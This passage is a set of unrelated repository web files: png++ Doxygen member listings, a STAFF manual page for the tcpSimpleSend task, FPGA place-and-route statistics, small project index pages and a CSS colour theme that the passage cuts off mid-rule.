<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>png++: Member List</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <link href="doxygen.css" rel="stylesheet" type="text/css"/> </head> <body> <!-- Generated by Doxygen 1.7.4 --> <div id="top"> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">png++&#160;<span id="projectnumber">0.2.1</span></div> </td> </tr> </tbody> </table> </div> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="namespaces.html"><span>Namespaces</span></a></li> <li class="current"><a href="annotated.html"><span>Classes</span></a></li> <li><a href="files.html"><span>Files</span></a></li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="annotated.html"><span>Class&#160;List</span></a></li> <li><a href="hierarchy.html"><span>Class&#160;Hierarchy</span></a></li> <li><a href="functions.html"><span>Class&#160;Members</span></a></li> </ul> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" href="namespacepng.html">png</a> </li> <li class="navelem"><a class="el" href="classpng_1_1info.html">info</a> </li> </ul> </div> </div> <div class="header"> <div class="headertitle"> <div class="title">png::info Member List</div> </div> </div> <div class="contents"> This is the complete list of members for <a class="el" href="classpng_1_1info.html">png::info</a>, including all inherited members.<table> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a254c2504eba5a409b23017b2a6f5427e">drop_palette</a>()</td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#aa299bb6730c4b68883d7683699dfd035">get_bit_depth</a>() const </td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a8b8b0e44c44d2071d70c8606c0390854">get_color_type</a>() const </td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#ae8f5870c3fd31cc3f0cb158c2a20bbcd">get_compression_type</a>() const </td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a71305d6b01e0c58838144b01d10bbb14">get_filter_type</a>() const </td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a640f6451351d62920fa2786dea53cd4d">get_height</a>() const </td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#ac43327884ca1d053002cb3ba3ef24188">get_interlace_type</a>() const </td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a3577210685e93050122d4974fc1c390a">get_palette</a>() const </td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#ae48397a02ae6ddaf87aa95d8c513ec23">get_palette</a>()</td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1info__base.html#a030a8262a2ef1bf8c97a2eafe71c2f3c">get_png_info</a>() const </td><td><a class="el" href="classpng_1_1info__base.html">png::info_base</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1info__base.html#afe70c0d333349a9b5fc7a1d046fc3fbc">get_png_info_ptr</a>()</td><td><a class="el" href="classpng_1_1info__base.html">png::info_base</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a9dfd2ebd5421d27c1ed839262e995650">get_tRNS</a>() const </td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a1b5f16559a9ad9108681b92b6529a113">get_tRNS</a>()</td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#ac13df5daaabb2219cf1d52c95b1f98c7">get_width</a>() const </td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#aa929b11e8c237865f7a4c9acd0ea61cf">image_info</a>()</td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1info.html#a6de7c51766261018632d21405e3a2563">info</a>(io_base &amp;io, png_struct *png)</td><td><a class="el" href="classpng_1_1info.html">png::info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1info__base.html#a2faea4c556a6e5ad70dec4dc27a06a5f">info_base</a>(io_base &amp;io, png_struct *png)</td><td><a class="el" href="classpng_1_1info__base.html">png::info_base</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a09d04b19ad511e5f4249e9dfa0e62efa">m_bit_depth</a></td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [protected]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a196348cce026bf93062a80eff78958e7">m_color_type</a></td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [protected]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#aace206556a5c185a86542702b72a45dc">m_compression_type</a></td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [protected]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#aaa7afab91bfab66e0daa966695d40967">m_filter_type</a></td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [protected]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#ad36dc08da3efe4e26322e3c8eb55adfc">m_height</a></td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [protected]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1info__base.html#a55a07d9e2ff9660850e5a1c9156e076a">m_info</a></td><td><a class="el" href="classpng_1_1info__base.html">png::info_base</a></td><td><code> [protected]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a988c3d5bfead5238afa04a1061e0f04a">m_interlace_type</a></td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [protected]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1info__base.html#a8911199becf531b509203656c4392e64">m_io</a></td><td><a class="el" href="classpng_1_1info__base.html">png::info_base</a></td><td><code> [protected]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a1fb1b97e0f153d8203aa79d667b488c8">m_palette</a></td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [protected]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1info__base.html#ab2052faecb79f17e2b0bb697e0cbbb46">m_png</a></td><td><a class="el" href="classpng_1_1info__base.html">png::info_base</a></td><td><code> [protected]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#ae16512ad01beea645e75e0edd60f0720">m_tRNS</a></td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [protected]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a4acee97cd5ab36c631099e788ffdf08c">m_width</a></td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [protected]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1info.html#a8788080158fc7450911516c23d4b584c">read</a>()</td><td><a class="el" href="classpng_1_1info.html">png::info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a1f1cf6197f7d0241d7410916076a6c08">set_bit_depth</a>(size_t bit_depth)</td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a2eb5d253e70b620a1050affd316dfb78">set_color_type</a>(color_type color_space)</td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a5a645e38fe10f80ced96301cdb0dec74">set_compression_type</a>(compression_type compression)</td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a886e48b7371f2768acb9fc9768d57366">set_filter_type</a>(filter_type filter)</td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a6ccb5704bf7f715572a6129bf3009761">set_height</a>(size_t height)</td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a19a24d29c7f47223a8df1164c093361c">set_interlace_type</a>(interlace_type interlace)</td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#acfc3675399a946f411d2a6e0054401f4">set_palette</a>(palette const &amp;plte)</td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a939bed5115330604e67950dc63b555e3">set_tRNS</a>(tRNS const &amp;trns)</td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1image__info.html#a3d23fc1552357d39fe4d8d017b9bea0a">set_width</a>(size_t width)</td><td><a class="el" href="classpng_1_1image__info.html">png::image_info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1info.html#a76309c30eb25d8242ae039a2e80bb1d3">sync_ihdr</a>(void) const </td><td><a class="el" href="classpng_1_1info.html">png::info</a></td><td><code> [inline, protected]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1info.html#a544c5e25c4211ef33976e3ac2b2ea020">update</a>()</td><td><a class="el" href="classpng_1_1info.html">png::info</a></td><td><code> [inline]</code></td></tr> <tr class="memlist"><td><a class="el" href="classpng_1_1info.html#a863333fbef670b244920022d1a0ee210">write</a>() const </td><td><a class="el" href="classpng_1_1info.html">png::info</a></td><td><code> [inline]</code></td></tr> </table></div> <hr class="footer"/><address class="footer"><small>Generated on Thu Apr 21 2011 22:55:13 for png++ by&#160; <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.7.4 </small></address> </body> </html>
staff-distribution/src/main/doc/user_manual/user_manual_files/tcpSimple/tcpSimpleSend_task.html
fix-protocol-tools/STAFF
<!-- ~ Copyright © 2011-2014 EPAM Systems/B2BITS® (http://www.b2bits.com). ~ ~ This file is part of STAFF. ~ ~ STAFF is free software: you can redistribute it and/or modify ~ it under the terms of the GNU Lesser General Public License as published by ~ the Free Software Foundation, either version 3 of the License, or ~ (at your option) any later version. ~ ~ STAFF is distributed in the hope that it will be useful, ~ but WITHOUT ANY WARRANTY; without even the implied warranty of ~ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ~ GNU Lesser General Public License for more details. ~ ~ You should have received a copy of the GNU Lesser General Public License ~ along with STAFF. If not, see <http://www.gnu.org/licenses/>. --> <html> <head> <title>tcpSimpleSend(deprecated)</title> <link href="../stylesheet.css" rel="stylesheet" type="text/css"> </head> <body class="verd"> <h1>tcpSimpleSend(deprecated)</h1> <h2>Description</h2> <p>tcpSimpleSend task sends portions of data from the file to the TCP session.</p> <h2>Parameters</h2> <table border="1"> <tr> <td><b>Attribute</b></td> <td><b>Description</b></td> <td><b>Default</b></td> <td><b>Required</b></td> </tr> <tr> <td>refid</td> <td>Reference name of the TCP session to receive messages from.</td> <td>None</td> <td>Yes</td> </tr> <tr> <td>file</td> <td>File containing data to be sent.</td> <td>None</td> <td>Yes</td> </tr> <tr> <td>delimiter</td> <td>Regular expression for the delimiter between portions of data in the file. Each portion will be sent separately.</td> <td>'\n'</td> <td>No</td> </tr> <tr> <td>repeatDelay</td> <td>Delay between two sends.</td> <td>0</td> <td>No</td> </tr> </table> <h2>Examples</h2> <pre> &lt;tcpSimpleSend refid="TCPSimpleClient" file="batches/tcp_fix_logon.txt" delimeter="\n" repeatDelay="0.5"/&gt; </pre> </body> </html>
HW/RTL/06PCM-AUDIO-MICROFONO/Version_01/02 verilog/Otros/Prueba5/build/par_usage_statistics.html
Fabeltranm/FPGA-Game-D1
<TABLE BORDER CELLSPACING=0 WIDTH='100%'> <xtag-section name="ParStatistics"> <TR ALIGN=CENTER BGCOLOR='#99CCFF'><TD COLSPAN=1><B>Par Statistics</B></TD></TR> <TR><TD><xtag-par-property-name>Total Non-vccgnd Signals</xtag-par-property-name>=<xtag-par-property-value>115</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>Total Non-vccgnd Design Pins</xtag-par-property-name>=<xtag-par-property-value>257</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>Total Non-vccgnd Conns</xtag-par-property-name>=<xtag-par-property-value>257</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>Total Non-vccgnd Timing Constrained Conns</xtag-par-property-name>=<xtag-par-property-value>101</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>Phase 1 CPU</xtag-par-property-name>=<xtag-par-property-value>115.8 sec</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>Phase 2 CPU</xtag-par-property-name>=<xtag-par-property-value>117.3 sec</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>Phase 3 CPU</xtag-par-property-name>=<xtag-par-property-value>119.0 sec</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>Phase 4 CPU</xtag-par-property-name>=<xtag-par-property-value>149.7 sec</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>Phase 5 CPU</xtag-par-property-name>=<xtag-par-property-value>150.8 sec</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>Phase 6 CPU</xtag-par-property-name>=<xtag-par-property-value>150.8 sec</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>Phase 7 CPU</xtag-par-property-name>=<xtag-par-property-value>150.8 sec</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>Phase 8 CPU</xtag-par-property-name>=<xtag-par-property-value>150.8 sec</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>Phase 9 CPU</xtag-par-property-name>=<xtag-par-property-value>151.1 sec</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>AvgWirelenPerPin Fanout 1</xtag-par-property-name>=<xtag-par-property-value>2.0</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>AvgWirelenPerPin Fanout 2</xtag-par-property-name>=<xtag-par-property-value>1.0</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>AvgWirelenPerPin Fanout 3</xtag-par-property-name>=<xtag-par-property-value>11.0</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>AvgWirelenPerPin Fanout 4</xtag-par-property-name>=<xtag-par-property-value>0.2</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>AvgWirelenPerPin Fanout 10</xtag-par-property-name>=<xtag-par-property-value>4.6</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>AvgWirelenPerPin Fanout 50</xtag-par-property-name>=<xtag-par-property-value>8.8</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>AvgWirelenPerPin Fanout 100</xtag-par-property-name>=<xtag-par-property-value>0.0</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>AvgWirelenPerPin Fanout 500</xtag-par-property-name>=<xtag-par-property-value>0.0</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>AvgWirelenPerPin Fanout 5000</xtag-par-property-name>=<xtag-par-property-value>0.0</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>AvgWirelenPerPin Fanout 20000</xtag-par-property-name>=<xtag-par-property-value>0.0</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>AvgWirelenPerPin Fanout 50000</xtag-par-property-name>=<xtag-par-property-value>0.0</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>AvgWirelenPerPin Fanout 100000</xtag-par-property-name>=<xtag-par-property-value>0.0</xtag-par-property-value></TD></TR> <TR><TD><xtag-par-property-name>IRR Gamma</xtag-par-property-name>=<xtag-par-property-value>1.0010</xtag-par-property-value></TD></TR> </xtag-section> </TABLE>
docs/index.html
dlc123/raceto10
TESTING!
index.html
godfatherofpolka/RyhinerBoundingBoxTool
<!DOCTYPE html> <html> <head> <title>Ryhiner Tools</title> <meta charset="UTF-8"> </head> <body> <h1>Ryhiner Tools</h1> <ul> <li><a href="boundingBoxTool.html">Ryhiner Bounding Box Tool</a></li> <li><a href="centerBox.html">Ryhiner Center Box Tool</a></li> <li><a href="combine.html">Ryhiner Combine Tool</a></li> <li><a href="showPictures.html">Ryhiner Show Pictures Tool</a></li> <li><a href="split.html">Ryhiner Split Tool</a></li> </ul> <p>Siehe <a href="doc/RyhinerBoundingBoxToolDoku.pdf">Dokumentation (pdf, 2.63 MB)</a> f&uuml;r Erl&auml;uterungen und <a href="LICENSE">Copyright</a>.</p> <pre> Copyright 2012 Samuel Bucheli and Thomas Klöti, University Library Berne. This file is part of the Ryhiner Bounding Box Tool. The Ryhiner Bounding Box Tool is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. The Ryhiner Bounding Box Tool is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with the Ryhiner Bounding Box Tool. If not, see http://www.gnu.org/licenses/. </pre> </body> </html>
themes/photoGal/css/color.darkblue.css
degiurgiu/projectyii
/* mizu was here */ body > div#content-bg { z-index:-1;position:fixed; width:100%; height:100%; left:0; top:0; background:url(../../images/backgrounds/blur-background01.jpg) top center no-repeat; } /* main.css */ a{color:#26292e;} a:hover { color:#5e6b90; } body { background-color:#ccc; } /*noinspection CssInvalidPseudoSelector*/ input::-webkit-input-placeholder,textarea::-webkit-input-placeholder,input::-moz-placeholder,textarea::-moz-placeholder{color: #999; } .note { color:#666; } .flash-success { background-color:#000; } div.flash-success p { color:#FFF; } div.flash-success p,.flash-success a { color:#FFF;} #footer { background-color:#ccc; color: #111; } .button_dialog { color:#333333; background:-moz-linear-gradient(100% 100% 90deg, #ffc15d, #ffd773); background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#ffd773), to(#ffc15d)); background:-webkit-linear-gradient(#ffd773, #ffc15d); background:-o-linear-gradient(#ffd773, #ffc15d); } .hover, .button_dialog:hover { color:#FFFFFF; background:-moz-linear-gradient(100% 100% 90deg, #333333, #1a1a1a); background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#1a1a1a), to(#333333)); background:-webkit-linear-gradient(#1a1a1a, #333333); background:-o-linear-gradient(#1a1a1a, #333333); } .button_dialog.disabled:hover { background:none; color:#333333; } .error-summary { border:solid 2px #AE0303; background-color:#FFEFEF; } .error-summary p { color:#AE0303; } .success-summary { border:solid 2px #0BA55C; background-color:#C0FCDD; } .success-summary p { color:#0BA55C; } .demo-bar { background:none repeat scroll 0 0 #FFFF00; } .demo-inner { color:#333; } .demo-bar a { color:#666; } .demo-credentials { color:#666; } .export-item { border: 1px solid #C0C0C0; } .export-item:last-child {border-bottom: 1px solid #C0C0C0 } .export-item table.header { background-color: #E0E0E0; } .export-item .content table { background-color: #FFFF00; } .export-item.expanded table.header { background-color: #FFFF00;} .export-item table.header span.icon-edit { display: none; color: #FF4040; } .export-item .content tr.separator td { border-top: 1px solid #C0C0C0; } .export-item .content table.combi-fields { border: 1px solid #CCCCCC; } .export-item .content table.combi-fields td { background-color: #FFFFC0; } .export-controls { padding: 5px; border-top: 1px solid #FFFFFF; } .import-item { border: 1px solid #C0C0C0; } .import-item:last-child { border-bottom: 1px solid #C0C0C0; } .import-item.expanded table.header {background-color: yellow;} .import-item table.header { background-color: #E0E0E0; } .import-item table.header span.icon-edit { color: #FF4040; } .import-item .content table { background-color: #FFFF00; } .import-item .content tr.separator td {border-top: 1px solid #C0C0C0;} .import-item .content table.combi-fields {border: 1px solid #CCCCCC;} .import-item .content table.combi-fields td {background-color: #FFFFC0;} .import-controls {border-top: 1px solid #FFFFFF; } table.rules td {border-bottom:1px solid #FFF;} table.provision-info tr.active td, table.rules tr.active td {background-color: #a8f299;} div#error-box{ background: white;} div#error-box p { color: #888; } /* box.css */ /*noinspection CssInvalidPseudoSelector*/ ::-webkit-scrollbar-thumb { background-color:#BBB;} .styled-checkbox + label { background-color:#EEE; border:1px solid #CCC; } .styled-checkbox:checked + label { background-color:#26292e; border:1px solid #26292e; color:#FFF; } .styled-checkbox:checked + label:after { color:#FFF; } /*noinspection CssInvalidPseudoSelector*/ .scrollable::-webkit-scrollbar-track {border-left: 1px solid #BBB;} /*noinspection CssInvalidPseudoSelector*/ .scrollable::-webkit-scrollbar-thumb { background-color:#BBB;} /*noinspection CssInvalidPseudoSelector*/ ul.k-list::-webkit-scrollbar-track { background-color:#F5F4F8 !important; } /*noinspection CssInvalidPseudoSelector*/ ul.k-list::-webkit-scrollbar-thumb { background-color:#333 !important; border:1px solid white !important; } .box-placeholder { background-color:#252525; } .portlet-header { border-top:1px solid #6A6A6A; background-color: #2f3238; } .box_title_text, .portlet-title { color:#ccc; } .portlet-grid-info { color:#FFFF00; } p.separator { border-right:1px solid #555; } hr.separator { border-bottom:1px solid #BEBEBE; } div.portlet-msg { background-color:#FFF; } div.portlet-msg > p { color:#666; } .button_tooltip { color:#CCC; } .dialog_tooltip { color:#FFFF00; } .button_tooltip { color:#FFFF00; } div.portlet-buttons > a:after{ background-color:#26292e; color: #AAA; border:1px solid #26292e; } div.portlet-buttons > a:hover:after, div.portlet-buttons > a:hover{background-color:#26292e; border-color:#26292e; color:#FFFF00;} div.portlet-buttons a.toggle_button {background-color: #2F3238 !important; border: 1px solid #2F3238 !important;} div.portlet-buttons a.min_button:after{ background-color:#2f3238 !important; border:1px solid #2f3238 !important;} div.portlet-buttons a.min_button:hover:after{color:#FFFF00 !important;} div.portlet-buttons a.max_button:after{ background-color:#2f3238 !important; border:1px solid #2f3238 !important; } div.portlet-buttons a.max_button:hover:after{color:#FFFF00 !important;} a.delete:hover:after { background-color:#BC1010; color:#FAC8C8; border-color:#BC1010;} .box_content, .portlet-content { border-bottom:solid 1px #BEBEBE; background-color:#F1F1F1; } .portlet-content.black { border-bottom:solid 1px #222; border-top:solid 1px #222; background-color:#2f3238; } .box_content > div.scrollable, #fieldstab .scrollable , #exportWidgetForm .scrollable { background-color:#F5F5F5; } div.head-wrapper { border-bottom:solid 1px #BEBEBE; } div.body-wrapper { border-bottom:solid 1px #BEBEBE; border-top:solid 1px #FFF; } table.thead.items tr { color:#202020; } table.thead tr td:hover, table.thead tr th:hover { color:#5e7294; } .k-list > .k-state-selected, .k-list > .k-state-focused { color:#333; background-color:#FFF; border-color:#FFF; } .col-icon.gas:after, .col-rate.gas:after { background-color:#95CEFF; border:1px solid #00759D; color:#00759D; } .col-icon.strom:after, .col-rate.strom:after { background-color:#FFFF00; border:1px solid #8D8D00; color:#8D8D00; } .col-status.entwurf:after { background-color:#FFF; border:1px solid #BBB; color:#BBB; } .col-status.neu:after { background-color:#FFF; border:1px solid #BBB; color:#BBB; } .col-status.check_valid:after { background-color:#A8F299; border:1px solid #07771A; color:#07771A; } .col-status.check_invalid:after { background-color:#F8C5C5; border:1px solid #BC1338; color:#BC1338; } .col-status.exportiert:after { background-color:#FFFF00; border:1px solid #8D8D00; color:#8D8D00; } .col-status.in_progress:after { background-color:#FFFF00; border:1px solid #8D8D00; color:#8D8D00; } .col-status.storno:after { background-color:#F8C5C5; border:1px solid #BC1338; color:#BC1338; } .col-status.abgelehnt:after { background-color:#F8C5C5; border:1px solid #BC1338; color:#BC1338; } .col-status.error:after { background-color:#F8C5C5; border:1px solid #BC1338; color:#BC1338; } .col-status.confirmed:after { background-color:#A8F299; border:1px solid #07771A; color:#07771A; } .col-status.belieferung:after { background-color:#A8F299; border:1px solid #07771A; color:#07771A; } .col-status.beendet:after { background-color:#666; border:1px solid #222; color:#222; } .col-icon.private:after, .col-client-type.private:after { background-color:#FFF; border:1px solid #26292e; color:#26292e; } .col-icon.business:after, .col-client-type.business:after { background-color:#FFF; border:1px solid #26292e; color:#26292e; } .col-icon.immo:after, .col-client-type.immo:after { background-color:#FFF; border:1px solid #26292e; color:#26292e; } .grid-view .tbody tr.odd:hover { background-color:#FFFF00; } .grid-view .tbody tr.odd { background-color:#E8E8E8; } tr.odd { background-color:#E8E8E8; } .grid-view .total { border:1px solid #E8E8E8; background:-moz-linear-gradient(100% 100% 90deg, #E7E7E7, #F9F9F9); background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#F9F9F9), to(#E7E7E7)); background:-webkit-linear-gradient(#F9F9F9, #E7E7E7); background:-o-linear-gradient(#F9F9F9, #E7E7E7); } .grid-view button.expander:after { background-color:#FFF; border:solid 1px #FFF; color:#26292e; } .grid-view button.expander:hover:after, .grid-view button.expander.active:hover:after { background-color:#EEE; border:solid 1px #EEE;} .form .errorSummary { background-color:#FAC8C8; /*border-bottom:solid 1px #e2a9a9 !important;*/ } .form .errorSummary li { color:#BC1010; } .form div.successSummary { background-color: #A8F299; border-bottom: solid 1px #75CD6B; border-top: solid 1px #FFF; } .form div.successSummary > p { color:#067719; } .errorSummary a.link {float:none;color:blue;} .yiiTab .view { border-top:solid 1px #FFF; } .black .yiiTab .view { border-top:1px solid #222;} ul.box_menu, .yiiTab ul.tabs { border-bottom:1px solid #BEBEBE; background:-moz-linear-gradient(100% 100% 90deg, #e7e7e7, #f1f1f1); background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#f1f1f1), to(#e7e7e7)); background:-webkit-linear-gradient(#f1f1f1, #e7e7e7); background:-o-linear-gradient(#f1f1f1, #e7e7e7); } .black .yiiTab ul.tabs { border-bottom:1px solid #545454; background:-moz-linear-gradient(100% 100% 90deg, #2f3238, #333); background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#333), to(#2f3238)); background:-webkit-linear-gradient(#333, #2f3238); background:-o-linear-gradient(#333, #2f3238); } ul.tabs li { border-right:1px solid #BEBEBE; } .black ul.tabs li { border-right:1px solid #222; } ul.box_menu li a, ul.tabs li a {color:#999; border-right:1px solid #fff; } .black ul.box_menu li a, .black ul.tabs li a { color:#AAA; border-right:none; } ul.box_menu li a:hover, ul.box_menu li.ui-tabs-selected, ul.tabs li a:hover, ul.tabs li a.active { background:-moz-linear-gradient(100% 100% 90deg, #f1f1f1, #e8e8e8); background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#e8e8e8), to(#f1f1f1)); background:-webkit-linear-gradient(#e8e8e8, #f1f1f1); background:-o-linear-gradient(#e8e8e8, #f1f1f1); } .black ul.box_menu li a:hover, .black ul.box_menu li.ui-tabs-selected, .black ul.tabs li a:hover, .black ul.tabs li a.active { background:#6E6E6E; } .ui-state-active > a, .tabs a.active { color:#202020 !important; } .black .ui-state-active > a, .black .tabs a.active { color:#EEE !important; background: none repeat scroll 0 0 #009FE3; } ul.tabs > li > a span.tab-item-count { color: #fff; background-color: #26292e; } p.item-count { color: #fff; background-color: #666;} .portlet-separator { border-bottom:1px solid #CCC; border-top:1px solid #FEFEFE; background-color:#DDD; } .portlet-separator.error { background-color:#FAC8C8; border-bottom:solid 1px #e2a9a9 !important; } .portlet-separator.error > span { color:#BC1010; } a.rbutton { color:#AAA; border:1px solid #FFF; } .tab-content a.active { background-color:#EFEFEF; color:#000; } .portlet-footer.default { border-top:solid 1px #FFF; background:-moz-linear-gradient(100% 100% 90deg, #D3D3D3, #E0E0E0); background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#E0E0E0), to(#D3D3D3)); background:-webkit-linear-gradient(#E0E0E0, #D3D3D3); background:-o-linear-gradient(#E0E0E0, #D3D3D3); } .portlet-footer.black { border-bottom:1px solid #333; border-top:solid 1px #545454; background:-moz-linear-gradient(100% 100% 90deg, #1E1E1E, #363636); background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#363636), to(#1E1E1E)); background:-webkit-linear-gradient(#363636, #1E1E1E); background:-o-linear-gradient(#363636, #1E1E1E); } .box_statusline { color:#666; } .tb_control { border-top: 1px solid #ccc; color: #666; } .tb_control .page_jumper input[type="text"]{ background-color: #fff; border: 1px solid #FFF; color: #666; } .tb_control .summary a, .tb_control .yiiPager a { color:#666; border:solid 